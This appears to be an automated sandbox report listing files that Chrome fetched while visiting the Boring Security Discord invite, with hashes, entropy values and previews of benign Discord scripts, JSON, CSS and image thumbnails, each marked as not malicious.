                                                                          URL:https://discord.com/invite/boringsecurity
                                                                          Preview:<!DOCTYPE html>.<html>.<head> <meta charset="utf-8">. <meta content="width=device-width,initial-scale=1,maximum-scale=3" name="viewport">.<meta name="description" content="Check out the Boring Security community on Discord - hang out with 6598 other members and enjoy free voice and text chat." />.<meta name="twitter:card" content="summary_large_image" />.<meta name="twitter:site" content="@discord" />.<meta name="twitter:title" content="Join the Boring Security Discord Server!" />.<meta name="twitter:description" content="Check out the Boring Security community on Discord - hang out with 6598 other members and enjoy free voice and text chat." />.<meta property="og:title" content="Join the Boring Security Discord Server!" />.<meta property="og:url" content="https://discord.com/invite/boringsecurity" />.<meta property="og:description" content="Check out the Boring Security community on Discord - hang out with 6598 other members and enjoy free voice and text chat." />.<meta property
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (18792)
                                                                          Category:downloaded
                                                                          Size (bytes):212511
                                                                          Entropy (8bit):5.634656675337852
                                                                          Encrypted:false
                                                                          SSDEEP:3072:zODXzhauVG5hCekzjNxRTtF/Xn4waIFmFocegLjbgUuhaevRvWmDEi6Xki4kz4:zMX9zVGaTtFAwhFUoSsaevfDX6X14kz4
                                                                          MD5:124003CF48D8D6DC523E1ACAF95B2D7E
                                                                          SHA1:1199078BD32633142B024C71E3669474797166FF
                                                                          SHA-256:FC3ACD89993F8257C40DA3CBF3EBE2943F8EFC539DF95CDAC16FABB844A18612
                                                                          SHA-512:02714FE1872292D115E96AC520E51CB12976BDEA0F2C6F3A87177FA3FA9A3B76148F6D4BBE8CFB39245895E71C114E50EB4E5383473E1E0E66738FF83C9393F2
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://unpkg.com/@web3modal/html@2.7.1/dist/cdn/index-fec845d6.js
                                                                          Preview:import{p as at,y as M,r as J,u as Z,H as At,f as D,K as j,g as F,o as O,U as H,n as W,v as G}from"./bundle-7a116c93.js";/**. * @license. * Copyright 2019 Google LLC. * SPDX-License-Identifier: BSD-3-Clause. */const Ue=window,ti=Ue.ShadowRoot&&(Ue.ShadyCSS===void 0||Ue.ShadyCSS.nativeShadow)&&"adoptedStyleSheets"in Document.prototype&&"replace"in CSSStyleSheet.prototype,ei=Symbol(),di=new WeakMap;let to=class{constructor(t,n,o){if(this._$cssResult$=!0,o!==ei)throw Error("CSSResult is not constructable. Use `unsafeCSS` or `css` instead.");this.cssText=t,this.t=n}get styleSheet(){let t=this.o;const n=this.t;if(ti&&t===void 0){const o=n!==void 0&&n.length===1;o&&(t=di.get(n)),t===void 0&&((this.o=t=new CSSStyleSheet).replaceSync(this.cssText),o&&di.set(n,t))}return t}toString(){return this.cssText}};const jo=e=>new to(typeof e=="string"?e:e+"",void 0,ei),I=(e,...t)=>{const n=e.length===1?e[0]:t.reduce((o,i,r)=>o+(a=>{if(a._$cssResult$===!0)return a.cssText;if(typeof a=="number")return a;th
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):4818
                                                                          Entropy (8bit):7.915007544516778
                                                                          Encrypted:false
                                                                          SSDEEP:96:P8UKh06srmM+s2ytcG2dW6k5i0RMRciP6svO3gxq07X:PAhHsrzx2ytQ/OMGiPq3E7X
                                                                          MD5:0532C353B97F01651CED42C3F905D3D6
                                                                          SHA1:636069F46ABF03D0D95159969A7614BB9F5784E2
                                                                          SHA-256:1EC97AE4584C28A03CB37AB77E18C14AEDA246E0E85160A06DF06CD15DBFAE1B
                                                                          SHA-512:43BC53B918D95CA6F0BD3302FC78311EE6E931EFE41B9D4AD8A96B29D201F1D80CAB2A0B49A2EF0D50B4831B4455742380D5E71F0E07E3F8EE02EFAF9828602B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_poppunk_ac3f59a852.jpeg
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((..........."........................................@........................!..1AQ..aq."2...#BRr......3.45C..Sbc..................................5........................!1A.Q..aq....2.....#3B.."Cb............?..J..rY.D.B.....!.8.!.G..H...BD!.P.7$...G$..G.5.p...%..`.(^..x8/I..D9.o.,.....H.......$G$!.HB.%.%B..+.R.Q@.H.x....].7e}..%....Q...+P...:fAK.c......V..@.!.'...S.V.....l.S..v6..9../.s...'..AT.TS<...bp......xy..8P0t....X.......~.....bY..3.-.Xax!.D....._.v..Ka.y........2.s.4e.........<;..f.IT..fk(C...0.r....?E.....}=DFh..G....x.....R:.j...=.5.d.B......R'..~....\.G=.Y.`.>.OX.rN..S@..V.x...*.1......oeq.............X.D....B.l.ws.o9.... ..i.\.Kj.\..Z..5^5#.d.m.|W...>.Y)d..B......S....h.#e..a.T1.3l..R.1..x-{N.<AH.[aL.-=...U-..}.~.%\N)g......=.~......F.J.%.N..qB..!.HNS4..&.e........;/Li{.F.K.@.u..v.@..W.%w.>.eD......+(..Z
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):986
                                                                          Entropy (8bit):5.442167159095882
                                                                          Encrypted:false
                                                                          SSDEEP:24:Y7NceoX4fbomAHKM8D8AzvWF3WS4KcHNc9inqfFJRCCApk7rm7k:Y7ciboRHKm4vWF3WfkGmJRCDpkfEk
                                                                          MD5:9F1C26A5D13008A446CD6C595433B85B
                                                                          SHA1:FE9D5801D649F123D728513ACC1A0DA7801E5A29
                                                                          SHA-256:60A3116AA86E2D31DC1141AD9C28F61DC66BC7A45CCAD5B275F6F53E12DE856F
                                                                          SHA-512:16EC49CFAB2097C14FF066E31EE0A9364F985AD5296006D5B29D877B4BB10914D6D54AD648A5F1675A0DB63673B5F8FBBF4EE79542933FF223FFFAB23D00F7F8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:{"type":0,"code":"boringsecurity","expires_at":null,"flags":2,"guild":{"id":"933253328794689546","name":"Boring Security","splash":null,"banner":null,"description":null,"icon":"9b0ad1a7a2c911684a0e7e6e1e7bce2e","features":["PRIVATE_THREADS","NEWS","THREE_DAY_THREAD_ARCHIVE","AUTO_MODERATION","WELCOME_SCREEN_ENABLED","CREATOR_MONETIZABLE_PROVISIONAL","ANIMATED_ICON","ROLE_ICONS","TEXT_IN_VOICE_ENABLED","BANNER","INVITE_SPLASH","COMMUNITY","GUILD_ONBOARDING_HAS_PROMPTS","CHANNEL_ICON_EMOJIS_GENERATED","GUILD_ONBOARDING_EVER_ENABLED","MEMBER_PROFILES","SOUNDBOARD","CREATOR_ACCEPTED_NEW_TERMS","GUILD_ONBOARDING","SEVEN_DAY_THREAD_ARCHIVE","ANIMATED_BANNER","VANITY_URL"],"verification_level":2,"vanity_url_code":"boringsecurity","nsfw_level":0,"nsfw":false,"premium_subscription_count":24},"guild_id":"933253328794689546","channel":{"id":"933259185032925204","type":0,"name":"\ufe31\ud83e\udde2\ufe31change-roles"},"approximate_member_count":6598,"approximate_presence_count":1438}.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (26147)
                                                                          Category:downloaded
                                                                          Size (bytes):26202
                                                                          Entropy (8bit):5.660059121966324
                                                                          Encrypted:false
                                                                          SSDEEP:384:DGc5PONu6MNkqv/EYEGTLG6XcSKyDpg/5zRmJ6oNMCCRm1KPuCRzG5DZtIOLCi2l:yc5WNu64v/CGTLG6XcWpglaGhl
                                                                          MD5:EB7A7D56BC5D45772F811861118E0367
                                                                          SHA1:05AF7088BD1A1C36E5EC41219991DD9A180F64EF
                                                                          SHA-256:2F6D5A73D2407EA374ABAF7A16C09D2B554D53ADCC1B374FEF45AC0F39868BCD
                                                                          SHA-512:188F0033D173F50410A542CFE294FBD70AA2B24EEE9EE7A2C68EC0081F26FEDA61CE25DA3C7CA51CFE9B59F0AE0043D4061D5F4185F5DD49DB619485BADF523C
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/80083.8581aa78cb83cb4217b0.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["80083"],{267363:function(e,t,n){"use strict";n.r(t),n.d(t,{ack:function(){return c},ackChannel:function(){return E},bulkAck:function(){return _},localAck:function(){return f},enableAutomaticAck:function(){return I},disableAutomaticAck:function(){return C},ackGuildFeature:function(){return p},ackUserFeature:function(){return m}}),n("222007"),n("424973");var l=n("249654"),r=n("913144"),u=n("401690"),i=n("233069"),o=n("42203"),a=n("245997"),s=n("697218"),d=n("49111");function c(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=arguments.length>2&&void 0!==arguments[2]&&arguments[2],l=arguments.length>3?arguments[3]:void 0,u=arguments.length>4?arguments[4]:void 0;r.default.dispatch({type:"CHANNEL_ACK",channelId:e,messageId:l,immediate:t,force:n,context:d.CURRENT_APP_CONTEXT,location:u})}function E(e){e.isCategory()?!function(e){let t=arguments.length>1&&void 0!==arguments[1]&&arguments[1],n=arguments.l
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JSON data
                                                                          Category:dropped
                                                                          Size (bytes):6764
                                                                          Entropy (8bit):5.082843439503491
                                                                          Encrypted:false
                                                                          SSDEEP:96:2NCUuro6sDd/WvMMhfWhhXepqWehNbjT+OVi+h+lJW4hljyW/dGDbDe6nki2W1dJ:XPsJgpwMpfjbdGz
                                                                          MD5:7398E210BCAA854E6270A92AF6844156
                                                                          SHA1:2218E85F9C275B83CB0D931206AB3489427AD350
                                                                          SHA-256:B8E7D84C08989DCADA15BBF20CE54242E7A9E033E3611D5F58BE6CAC25D4B50E
                                                                          SHA-512:26DC64EDB4383C02FDE1224AB9BF8230E79088C48561090293319A943ADD3A50573B1E615C899DDF6B3A103722B0CF6208573EFADF1531D3C258CCF91F0303B7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:{"listings":{"ecc4036f814562b41a5268adc86270fba1365471402006302e70169465b7ac18":{"id":"ecc4036f814562b41a5268adc86270fba1365471402006302e70169465b7ac18","name":"Zerion","homepage":"https://zerion.io/","image_id":"73f6f52f-7862-49e7-bb85-ba93ab72cc00","order":60,"app":{"browser":"https://app.zerion.io","ios":"https://apps.apple.com/app/id1456732565","android":"https://play.google.com/store/apps/details?id=io.zerion.android&hl=en&gl=US","mac":"","windows":null,"linux":null,"chrome":"https://chrome.google.com/webstore/detail/zerion-wallet-for-web3-nf/klghhnkeealcohjjanjjdaeeggmfmlpl","firefox":null,"safari":null,"edge":null,"opera":null},"injected":[{"injected_id":"isZerion","namespace":"eip155"}],"rdns":"io.zerion.wallet","mobile":{"native":"zerion://","universal":"https://wallet.zerion.io"},"desktop":{"native":"zerion://","universal":"https://wallet.zerion.io"}},"19177a98252e07ddfc9af2083ba8e07ef627cb6103467ffebb3f8f4205fd7927":{"id":"19177a98252e07ddfc9af2083ba8e07ef627cb6103467ffebb3f
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 48 x 48, 8-bit colormap, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):1599
                                                                          Entropy (8bit):7.821138062732205
                                                                          Encrypted:false
                                                                          SSDEEP:24:gYzTx8OQ67P4/6KEH/l2fynaS0mskzDTlW5wRnCyYP12HSB4vLpUVrRuoB:dNE67w/6KOl2fsaS0UDzMdgA0pUVluk
                                                                          MD5:B793FEE8413648B6CF59AB51FBA83FE3
                                                                          SHA1:5869A1B152E577D9446CEBD4728A190B570B0FD9
                                                                          SHA-256:3B89DD2F6C26F0740BA7880E4E1188AE2C7C4626475FAFACEF4B92708DB7C260
                                                                          SHA-512:A2876764AE6417CF3C576CF89B83B332AF500B300875A4F29C16111A2B3BF8FD5B2E00D7440E64411B52428F404FA528F76C9909250482F2A7C14DD67A15351A
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_48,q_75/https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png?url=https%3A%2F%2Fboring-security-cms.s3.amazonaws.com%2Fthumbnail_ispeaknerd_9fc9526715.png&w=48&q=75"
                                                                          Preview:.PNG........IHDR...0...0.....`......;PLTE.f..h..m.e......d..e...........m..k..g..e..p....>?=...9.V...bca..........`.MJOa).ljm........XZY@.d...qrq....[..`....x{x.F.bYf.T.).7....X.C.... ..ECEN.vh7....:.F......K*\|7.T)lcS>565[.r.k.m/..^....)))p..F/RSPT.H....s..N.lY=U..u>.>.R\..k<.vA.YBeW5.gJvym.#.<8)A".+ZD&.?.G.d.[.tP..L.a..w.gT#.Y..a....A0.o93.t!.{..N..c-.....pHYs.................IDATx....S.L..7.n.BBH..w.M.H....k..........U.P..g..39ON.A.Q...4N...AK..tS.'....?.S....n.%..'.%......1..4........9..c9...n.H].%f............. QX..&.........@..Zl....wvvv.G.....x..!...0..f...W...i".@.<8(...~I..B..P.j..l...3..,..9......#...d...bq`&Z_...#...#.d"(.i^...Sf..k..!. ....yYX.(.;....M...4.....c.@....)..U.......b..U.}A..O....?'..p......D(.}......Y...AEHd.......z.j....UV.*a?-...`.H...O.U&..%.f.,+;...P..BR.....EAv... #u....X..<.3..Xzp....su~~:.."Q.i..L..,TJQ...sx,%..HV.}...M.'...0B.eF....x..N.....`DD....4....^8.;.r.... D.@..pw.s).y..(..}...1....`.!Q&.f)...D.G...{&.p'5"...2...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 256 x 256, 8-bit colormap, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):27664
                                                                          Entropy (8bit):7.979909882312714
                                                                          Encrypted:false
                                                                          SSDEEP:768:k4Qs9xSh5BomTXqf66RUc4rU/BdPD6Ng/gG:k4Z0ZTaf1EYPD6c
                                                                          MD5:07E8B0A794E4312DB77AB3B8DFBA900F
                                                                          SHA1:03DA823740DBC22100D7FD9823E45A3094FDC79F
                                                                          SHA-256:E3F5F00AC7BDE5C247385FA9554A4A6DF6A95DC955391C92ECC394DB6D6A0F9F
                                                                          SHA-512:A4905FE10F05417FF4E05C615F857CB08C1E256025912E97CEB8BE4B1B9E218EAB1CC7C6AB8E719078D0D7DF5401132192132835FC861D8878F5D7735145EF48
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_256,q_75/%2Fimages%2Flogo.png?url=%2Fimages%2Flogo.png&w=256&q=75"
                                                                          Preview:.PNG........IHDR.............k.XT....PLTELiq....*$73,...ihalmg/+,KIBQLHONG...,)"..."$#...$&$ "!.!.&('...)*((+,\bf,..CFF...EJL8<>...<@AJNPMRVbgkX]a|.....RX\...u{~/24jno...quv...=CG489......TVU.........fp{bb_.........y..T`n.........Xd....tRNS..v.p...X2.....C.....pHYs............... .IDATx.....8.5.....h._.K"A. .R"EJ.T%.....'.*.........~q..j... .y..../....................._..~.`.......q\...~6..~..&3.a...'......K....?..?.o..v0oo...f.c....Mooog3...>...i..~...o..}...E...\.J.j.*M/R."M.T.M%.mkn.r..../.._/X...cz{3..j..I.*m..J..j.T.M.6.h...DS.U...fP..d.O..7.......d.w!.*m...........l.../....i..x.O./of.?}....:.|..~.?.?..4..'...W.._,...S.|U'lVY.MY.wq..............[+.K.i*.....iC....@....K..'Q../E..R\.0..;{........-D/R2...7U......K..,...B.E..(.BTeS..n..O..B.....?........_......T.Y.3.Ry3.....i..,.*...i..."...y3..i....Oa...O.....^...e.......D{P.G6US.......i....o.l>.....?..{%4.......O...X.P.......\..7.I.u8.F4.[.V...._...E..=......[..'..^......X.....i..FP.....(.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (9563)
                                                                          Category:downloaded
                                                                          Size (bytes):9618
                                                                          Entropy (8bit):5.397774127496766
                                                                          Encrypted:false
                                                                          SSDEEP:192:0ERLsJcFkf02DaXF0gK5t/FY+n/bxQE4om8:0bJTTQSx1jP
                                                                          MD5:03CF2865188B7AE04064B5982E589E1C
                                                                          SHA1:275FD9C275EE8DD72D0AC342E67D4124BC86EF7C
                                                                          SHA-256:A6C9DB31E9E55DD5A650F87BF44E34726D597373A44ED7CB6C213F059558B323
                                                                          SHA-512:764F7FB6DC66346CDB2427330C1234012A8A23002DEAAA3854BB40A130566174CBAC47228544E80C2B6ADC8F19591DFC984519F872B9E55F1570017C919C54AE
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/53509.d075f1bff85f12b95485.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["53509"],{713810:function(e,t,d){"use strict";d.r(t),d.d(t,{sendFeedShownAnalytics:function(){return A},fetchGuildFeed:function(){return G},markGuildFeedItemAsSeen:function(){return M},markGuildFeedItemAsUnseen:function(){return U},removeItemFromGuildFeed:function(){return R},hideItemFromGuildFeed:function(){return L},fetchGuildFeedFeaturedItems:function(){return k},featureGuildFeedItem:function(){return C},unfeatureGuildFeedItem:function(){return w},unhideItemFromGuildFeed:function(){return H},setFeedItemPreference:function(){return N},trackFeedItemInteracted:function(){return O}});var n=d("917351"),i=d.n(n),a=d("611221"),l=d("801110"),u=d("885167"),s=d("872717"),r=d("913144"),E=d("599417"),o=d("887446"),c=d("27618"),f=d("938237"),_=d("395118"),I=d("599110"),F=d("449008"),h=d("350928"),m=d("185014"),p=d("60036"),D=d("145708"),S=d("2804"),y=d("515631"),T=d("49111");function g(e,t){return t.map(t=>m.default.getItem(e
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (12843)
                                                                          Category:downloaded
                                                                          Size (bytes):12898
                                                                          Entropy (8bit):5.519664064414933
                                                                          Encrypted:false
                                                                          SSDEEP:192:6uuHW4YFELx4/bk2jK7UF0IE2n+d1m7Y44GbfsvilpuRTntR8:6u2d4/bLOYqPmUGi2YdnI
                                                                          MD5:1A0C6C167841F38E72FEB1D6FF7F0FF3
                                                                          SHA1:8E67ED65B7D96DC65CFB735F0569DBCF7F7332E2
                                                                          SHA-256:944DF6F9122EBA307E0ED30E547BD7E0263328ECDFC8599D1D2092306065777F
                                                                          SHA-512:11AA4CF4AD6E215269DA6C505C4F8F4B0667E9950C58846E12211028E9FC62EC5D43751305B8D46E0E3FC4DD084241BA1592C5D8EE7C05B1D752F0BC86551889
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/22198.60494a9d4db5b29906c5.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["22198"],{335189:function(e,t,r){"use strict";r.r(t),r.d(t,{saveClydeProfile:function(){return s},addClydeGuildMember:function(){return c},generatePersonality:function(){return d},setPendingPersonality:function(){return _},setPendingNick:function(){return p},setPendingAvatar:function(){return y},setPendingBanner:function(){return S},setPendingThemeColors:function(){return T},resetPendingChanges:function(){return I},fetchClydeSettings:function(){return C},fetchClydeProfile:function(){return A},createClydeProfile:function(){return L},startEditingClydeProfile:function(){return m},doneEditingClydeProfile:function(){return D}});var n=r("872717"),i=r("913144"),u=r("327037"),l=r("599110"),o=r("473591"),a=r("680894"),f=r("49111");async function s(e,t){let r=await E(e,t);return r}async function c(e){return await n.default.put({url:f.Endpoints.GUILD_CLYDE_ADD_MEMBER(e),oldFormErrors:!0})}async function d(e){try{let t=await n.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):17273
                                                                          Entropy (8bit):7.98267978232318
                                                                          Encrypted:false
                                                                          SSDEEP:384:rwxVswtc4ZT8HW7tU14hNNdvCIjP3vc4A3+vX/tPOUgsSa+K:B4ZT8CtU1qbjP3ks/sUAa+K
                                                                          MD5:723BC36B7DFB2AB00B53BC8D4464551F
                                                                          SHA1:85F665935B26BC83619B9233DF35595438582F5B
                                                                          SHA-256:6B5BCEA7B1C7F38AB13BA5C2962484FE9D6EB934B379A1289BEC63FA88041333
                                                                          SHA-512:1703F7A4D89CEC5F7CF9B5AED0D40C1C452A6A5D0651B2C656304F60042094EA823836B46428CC2ECE5A5264F09F5FCA9191AA265A7FB2DC6AA1369882A4CFC2
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_ispeaknerd_9fc9526715.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..].|.....K/$..H.i.zB...B'.z...z.A.a.`CEz......4....l`W.......o.fovs.\..............6_a.menEEE..._.xQ......3.c`.....c...-.0...-+....e.a..nC.yY..|.K...u54V...nM....9(.}.......@c....}X!..u....-+./.D....A.3.0....|.....j.W.T.'.@Hp=.lQ...g.1.m@.[..5.-..O...^.M..-.t.........t....s5Q.Z....I......?~..4o.?.f....b.[.A$A%>W..\.0.......b2[.t.]|..(.....5k.W..&.'.].v!".....!..S.il..H6.&......,....=Y....8.%0.Ob.......s.uT.jh.........4.M.:U.j...V.s@.$..A'6J;.....G@...[..........k.....k.l.O.F..N.0&..s..[..e..T.L.....C.03..'...q..9..g.r..3..5.k......Sun....y.:....#( H3w.bI(d.5.d.jF...`).r#.|>....F....1.....G...arax..w.....j...l...p.B..n..$.|..$..Q5c/...Ds*.k.eX.j.6v..hnF!.G.....w9.Z.w....s.7v....s}.b7[..%S...T.Tb..9..'?<..g.^.X\.5:.G.Z....~...fks..\..C.....GM.k.~.-.k/.fa.a......,`SA7..@.i1\.7..6.o............~.a..0."...\U..j.RUp."P.._].......{.=..ava...q......Y..pB~K....MMM..y...|. 7.X......c&t....t%.j...
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15715)
                                                                          Category:downloaded
                                                                          Size (bytes):15764
                                                                          Entropy (8bit):5.5649261541849295
                                                                          Encrypted:false
                                                                          SSDEEP:384:wOrcE+wCFgFLNcT3R00fp6Mh3ljKDKuJ/oASJ2AvABNXjYZGFUiqdGd7x:wOrcE+wCFgFLNcTKk6W3IKuyAqMFUiqg
                                                                          MD5:6A513E08BB57247EE2A7F7F28392D957
                                                                          SHA1:9AD8A8814F81F63D7E6302F913B45A047F2E8985
                                                                          SHA-256:E6A791274EC54C4A3AC6C8B2F7A2689D04E9579F00B218E9E849ABAE247C0FC6
                                                                          SHA-512:EDB103F912B2BC70A7BDF7A730A5E0AB450A9FC842729FE14F444C88F36368E6A2E15BB5A6FC480A7FF4F0BD9931C85A5BE624E00ECE2EA11DEFA1088D150991
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/e9e649f003bbece806b1.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75939"],{75651:function(e,n,t){"use strict";e.exports="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 66 38' width='66' height='38'%3E%3Crect x='0' y='0' width='66' height='38' style='fill: rgb(0, 0, 0); stroke: rgb(0, 0, 0);'%3E%3C/rect%3E%3C/svg%3E"},753235:function(e,n,t){"use strict";e.exports="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='6.122 5.864 259 50' width='259' height='50'%3E%3Cpath fill='%23000000' fill-rule='evenodd' d='M 68.122 11.864 L 192.122 11.864 C 193.779 11.864 195.122 13.207 195.122 14.864 L 195.122 28.864 C 195.122 30.521 193.779 31.864 192.122 31.864 L 68.122 31.864 C 66.465 31.864 65.122 30.521 65.122 28.864 L 65.122 14.864 C 65.122 13.207 66.465 11.864 68.122 11.864 Z M 68.122 35.864 L 262.122 35.864 C 263.779 35.864 265.122 37.207 265.122 38.864 L 265.122 48.864 C 265.122 50.521 263.779 51.864 262.122 51.864 L 68.122 51.864 C 66.465 51
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):459339
                                                                          Entropy (8bit):5.257564696490248
                                                                          Encrypted:false
                                                                          SSDEEP:6144:UPAHdySTrbCGIc7ZSry4H0ICIWcxEasMgOty:UPAHdySf2GIOZnCEDvOI
                                                                          MD5:1392EBB8DD976538BC1E20AB041EAA8B
                                                                          SHA1:07B7DD1954B637FE10FC0F6AF0D869899F3828F0
                                                                          SHA-256:00688170FAE69072F58A8EE9D0EB0648CC48597B51D1513061AB1DC7CD19479B
                                                                          SHA-512:212B11DC725655D132BBF9DE64D381355CAC2654099FC21AEEADCCDFB8AF1557D591FED18AD3D7BABB5045EE311D01F26B7D1FAB8780F9D9A4D4C6490116C27D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/shared.f01e9143e31c19a68a8e.css
                                                                          Preview:@value contentWidthRestrictedLimit: 848px;.footer_cb147f{position:relative;padding:80px 160px 48px;font-weight:400;overflow:hidden}.footerPrimary__59c07{background:#111214}@supports(color:rgba(0,0,0,0))and (top:var(--f)){.footerPrimary__59c07{background:hsl(220 calc(8.1%*var(--saturation-factor,1))7.3%)}}.footerBackgroundPrimary__1560e{position:absolute;bottom:0;left:0;width:100%}.footerBackgroundAnimate__950ea{animation:footer-blob-animation__84405 100s linear infinite alternate}.footerBackgroundPaused__12e54{animation-play-state:paused}.footerBackgroundPlay_ac81a7{animation-play-state:running}.footerContent__0ec68{position:relative;max-width:1600px;margin:0 auto}.navigation_d53adf{display:flex;justify-content:space-between}.navigationHeader__37d75{color:#fff;font-size:14px;margin-bottom:13px}@supports(color:rgba(0,0,0,0))and (top:var(--f)){.navigationHeader__37d75{color:hsl(0 calc(0%*var(--saturation-factor,1))100%)}}.route__940ec{color:hsl(calc(1 * 0%), 100%-hsl / 0.6);color:hsl(var
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 48x48, components 3
                                                                          Category:dropped
                                                                          Size (bytes):1195
                                                                          Entropy (8bit):6.805189264150663
                                                                          Encrypted:false
                                                                          SSDEEP:24:V9YMWcv6monG4HVpbLIdUYHqiIalAKOrRlm1ekW08/QRkHQ5YH:V9YMfCmo9HjKKlm1e0XRWQ5YH
                                                                          MD5:FDDF7C77666F467B7CFA3635D4A89CA0
                                                                          SHA1:26941D00B859E6876FA9D0F97790DF3FECAA869E
                                                                          SHA-256:D544633EB8752D259DA12A8055ABE9BC3C7363919BBF9C993FC1AB0D56CC940F
                                                                          SHA-512:EFDB051F8D8C575FA941C6924ED1ED23CDCD163CE55C0AAD388B5F71F178FE87110A374F00FF1DFA1DB1CB51DC5F3A40EE9454402401AB8C9E7190B92C73B480
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......0.0.."............................................................................c.DP..U.z....cj.....{..Z.....i..w.%...g... ............................ 2...........3..a.J.z'.Y..+.m"U.lW.m.....3V.Eu6-.d{.....J......+...E...-%.. ....7...L]...*......................................?..v.#?...........................1.........?...Z[...b.....'......................!.."1A.Qa. #BR.........?...d..W....8.Cj....P.'.......{92.Nc....[.O.....xBY..|.CS.....7",..l9.Y.fT.. ...@7H:.&Z.k.e.P.3........!....................!1Qq.Aa............?!Q...p.2..t! ... .x.W.('...D.$',%..\...R{.XEYMS#6u.b..x^..n.W.s..CA..I1../.......Ov..u3..a....,-K~....)0.......jg.G..................>...........................1........?..u..............................!Q1.Aq.........?.....%.Q.N...,w....W...."....................!1AQaq..............?...HX....*......1.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGB, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):13664
                                                                          Entropy (8bit):7.980160074277059
                                                                          Encrypted:false
                                                                          SSDEEP:384:E35GnZ8/TvIo1ZENhVmZKqa8kD7J/o+1bH9LGMvArxb0:y5GnuZsMZKqU6cD96CArS
                                                                          MD5:1591539C44BF48640C98506318F734B8
                                                                          SHA1:5058EED739D3A2545F0E0A4508309674B9875C5F
                                                                          SHA-256:C56259278059D5A18693C3AF0697A33E12ADAAFE9FEA58E0612AAC996585618D
                                                                          SHA-512:12850DC8450DD1C4D7EC605382D78A3146E11BBEE4C4E1340938D0D908F61F5138BDDCB3C2F796ADA3EC698DCF18CE37D7B6B33A34688441D9A46571D3DE3E74
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_Jons_Doodley_Doo_9e4a536842.png
